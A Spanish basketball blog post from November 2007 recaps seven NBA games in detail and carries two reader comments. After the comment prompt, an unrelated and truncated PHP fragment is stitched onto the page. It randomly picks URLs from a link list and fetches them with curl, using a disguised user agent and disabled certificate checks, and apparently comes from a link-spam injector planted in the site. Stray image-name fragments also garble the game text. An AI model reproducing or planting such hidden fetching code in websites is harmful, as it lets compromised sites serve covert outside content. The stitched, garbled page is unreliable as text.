La crónica (27/11/07)

28 de November de 2007 por MagicJohnson32

La victoria de los Cavaliers ante los Celtics en un partido con sabor a Playoffs fue lo más destacado de la pasada madrugada en la NBA, que dejó victorias de equipos necesitados como los Heat y los Bulls, y alguna sorpresa, como el triunfo de los Sixers en Milwaukee. También nos deparó otra titularidad de Navarro y otra victoria de los Grizzlies, esta vez en pista de New Jersey y con un destacado Gasol. Por último, los Pacers estuvieron a punto de tropezar con la misma piedra y los Lakers encontraron la mejor medicina para situaciones de crisis: los Sonics, que igualan su peor arranque histórico (2-13).

Aquí tienes un resumen en imágenes de la pasada madrugada:

Y a continuación, la crónica de los partidos:

Celtics 104 – 109 Cavsbronkg

Si el equipo acompaña a LeBron, los Cavs pueden hacerse muy peligrosos. Tanto como para inflingir a los Celtics la segunda derrota de la temporada en un partido decidido en la prórroga. El Big Three particular de los Cavs, LeBron-Ilgauskas-Gooden, superó al de los Celtics, en los que Allen logró 29 puntos pero falló dos tiros libres con el marcador empatado a 92 (tanteo con el que se llegó a la prórroga). A los 38 puntos y 13 asistencias de James, Gooden añadió 24 y 13 rebotes, e Ilgauskas, 15 puntos, 14 rebotes, 5 asistencias y 4 tapones. Pavlovic acompañó con 16-5-3-3. En los Celtics, Garnett se quedó en 19-5-5-3, mientras Pierce hizo 16-6-5, en un partido con aroma a Playoffs.

paunetsGrizzlies 110 – 103 Nets

Estamos acostumbrados a ver a Navarro liderar sus equipos en anotación. Anoche lo hizo en rebotes. 16 puntos, 4 asistencias y 11 rebotes de la Bomba en 38 minutos, 22-6-5 de Gasol y 19-9 de Mike Miller bastaron a los Grizzlies para superar a los Nets a domicilio pese a la gran actuación de los tres de siempre, Kidd (con nuevo triple-doble, 12-15-12), Carter (de vuelta al cinco inicial con 32-9-7) y Jefferson (22-4-5). Memphis abrió brecha en la primera mitad y llegó a liderar por 18 puntos pero los Nets reaccionaron y se quedaron a un punto de remontar (99-98). Una canasta de Lowry cortó la remontada y los de Tennessee pudieron sellar su segunda victoria seguida y la quinta de la temporada.

Bobcats 90 – 110 Heat

Al fin los Heat mostraron su talento ofensivo. Liderados por los 23 puntos de Ricky Davis, más 19 del rookie Daequan Cook, los de Florida se impusieron con mucha claridad a unos Bobcats muy espesos y en los que ninguna de sus estrellas estuvo al nivel que se le supone. Felton fue el mejor visitante con 14 puntos, 6 rebotes, 7 asistencias, pero su equipo hizo aguas en defensa y permitió a los Heat lanzar con un 58% de acierto y no exigieron de grandes actuaciones de Wade y Shaq, que se quedaron en 13 y 15 puntos respectivamente. La de anoche fue la segunda ocasión en lo que va de temporada en que los Heat superan los 100 puntos, y la primera en la que esto les sirve para ganar.

Sixers 114 – 99 Bucks

Cinco jugadores de los Sixers anotaron 15 o más puntos, tres de ellos superaron la veintena, y los de Philadelphia ganaron claramente en Milwaukee en lo que supone la primera victoria visitante en el Bradley Center en lo que va de temporada. El regreso de Korver tras su ausencia en los últimos cuatro partidos dio frescura al ataque de los Sixers, que superaron desde el primer momento a los Bucks y se situaron 32-18 tras doce minutos de juego. El segundo cuarto sirvió para equilibrar el marcador pero en la segunda mitad los Sixers fueron claramente superiores liderador por Iguodala, con 20-11-4, y Andre Miller, con 18-8-9.

Hawks 78 – 90 Bulls

Ayer no ganó el mejor en Illionis, ganó el menos malo. Al acabar la primera parte el resultado en el electrónico era un paupérrimo 31 – 34, dando de fe del mal juego de ambas franquicias y de su escaso acierto en el tiro. Chicago basó finalmente su victoria en el aspecto reboteador, igualando con 60 el récord de la temporada que estaba en posesión de Charlotte. Luol Deng, con 22 puntos y 9 rebotes y Ben Gordon con 21 puntos fueron los jugadores más destacados del partido. En Atlanta sólo se salvó de la quema el rookie Al Horford con 8 puntos y 14 rebotes. Joe Johnson y Josh Smith se combinaron para realizar un terrible 9 de 32 en lanzamientos de campo, aunque Josh expió un poco su culpa con 6 tapones, aumentando a 65 el número de partidos en los que realiza como mínimo un tapón.

Pacers 112 – 110 Nuggets

Hace 15 días los Pacers perdieron en Denver un partido que al descanso ganaban por 25 puntos. Ayer estuvo a punto de suceder lo mismo pero finalmente JR Smith falló el lanzamiento de tiro libre que hubiera empatado el partido a falta de pocos segundos. Mike Dunleavy lideró a un equipo falto de líder debido a la lesión que arrastra Jermaine O’Neal y que le ha obligado a perderse ya 4 partidos. Dunleavy acabó el partido con 30 puntos y estuvo perfectamente secundado por un Jamaal Tinsley que se quedó a 2 rebotes del triple doble (15-8-11) y un Shawne Williams que jugaba su primer partido como titular esta temporada (21-11). En los Nuggets la combinación habitual Iverson-Melo-Camby recibió esta vez la ayuda de Anthony Carter (17-8-6) y JR Smith, algo que dotó esta vez de mayor profundidad a su banquillo.

 mikefloor

Sonics 99 – 106 Lakers

¿Atraviesa usted una mala racha de resultados? ¡¡Ponga a los Sonics en su calendario!! Eso mismo hicieron los Lakers, que cortaron ante los de Seattle una racha de tres derrotas seguidaskobereferee con un triunfo que llegó a complicarse en los minutos finales pese a estar encarrilado desde el tercer periodo. Bryant anotó seis de sus 35 puntos en ese tramo final, en el que Lakers perdió varios balones y concedió canastas fáciles, para asegurar una victoria que no impidió el enfado de Phil Jackson. Bryant añadió 8 rebotes y 6 asistencias, además de buenos porcentajes de tiro (12 de 22), y contó con la colaboración de Odom, autor de 20 puntos y 8 rebotes, Bynum (que volvió a hacer un doble-doble con 12-10), y Fisher (14-8-4). En los Sonics, Durant logró 25 puntos, la mayor parte en los minutos finales, Wilcox hizo 18-7 y Watson añadió 16-6-6 desde el banquillo.

Comenta

2 comentarios a esta entrada

  1. Olafur dice:
    #1

    Tremenda crónica Malone, a destacar la mega boina de Okafor a Shaq que lo tira de espaldas y a Navarro que a este paso reboteara mas que Pau juas juas

      Citar

  2. Dantley dice:
    #2

    11 rebotes de Navarro no sé si es síntoma de que ha progresado físicamente, síntoma de las pedradas de los Nets que rebotaban muy lejos o de la intensidad a la hora de buscar el rebote de los grandes de New Jersey (llamarlos centers o similar es demasiado piropo) y Memphis (anda, pero si es Gasol)

    En cualquier caso viene bien para sumar estadísticas que eso siempre cuenta para los análisis. De momento, ya se metió en el top-10 rookie, creo que en una o dos semanas se mete en el top-5 y se asegura All-Star (+ concurso de triples???) y de paso contrato millonario para el año que viene

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>